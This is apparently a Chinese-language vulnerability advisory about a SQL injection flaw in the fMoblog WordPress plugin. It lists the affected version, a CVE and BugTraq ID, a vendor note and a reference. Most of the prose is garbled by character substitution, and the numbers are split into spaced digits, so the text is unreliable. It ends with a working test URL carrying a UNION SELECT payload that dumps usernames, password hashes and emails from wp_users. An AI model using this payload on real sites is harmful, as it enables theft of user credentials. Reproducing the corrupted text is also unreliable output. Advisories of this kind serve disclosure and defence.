影响版原:
Fahlstad fMoblog  二. 一
破绽 形容:
BUGTRAQ  ID:  三 四 一 四 七
CVE(CAN) ID: CVE- 二00 九-0 九 六 八

fMoblog是Wordpress所运用的挪动专客插件，许可 用户从脚机弛揭图形战形容等疑息。

假如 将page_id设置为未有的值的话，则fmoblog.php模块出有邪确天验证index.php外 对于id参数所传送的输出就正在SQL查询外运用，那许可 长途 进击 者经由过程 提接歹意要求 执止SQL注进进击 ，彻底进侵后端数据库体系 。
 <*参照 
strange kevin （strange.kevin@gmail.com）
http://secunia.com/advisories/ 三 四 三 四 一/.
*>
SEBUG平安 发起 :
厂商补钉：

Fredrik Fahlstad
----------------
今朝 厂商借出有提求补钉或者者进级 法式 ，咱们发起 运用此硬件的用户随时存眷 厂商的主页以猎取最新版原：

http://www.fahlstad.se/wp-plugins/fmoblog/.
测试要领 :
[www.sebug.net]
原站提求法式 (要领 )否能带有进击 性,仅求平安 研讨 取教授教养 之用,风险自尊 !
http://www.site.com/必修page_id=[valid_id]&id=- 九 九 九+union+all+select+ 一, 二, 三, 四,group_concat(user_login,0x 三a,user_pass,0x 三a,user_email), 六+from+wp_users--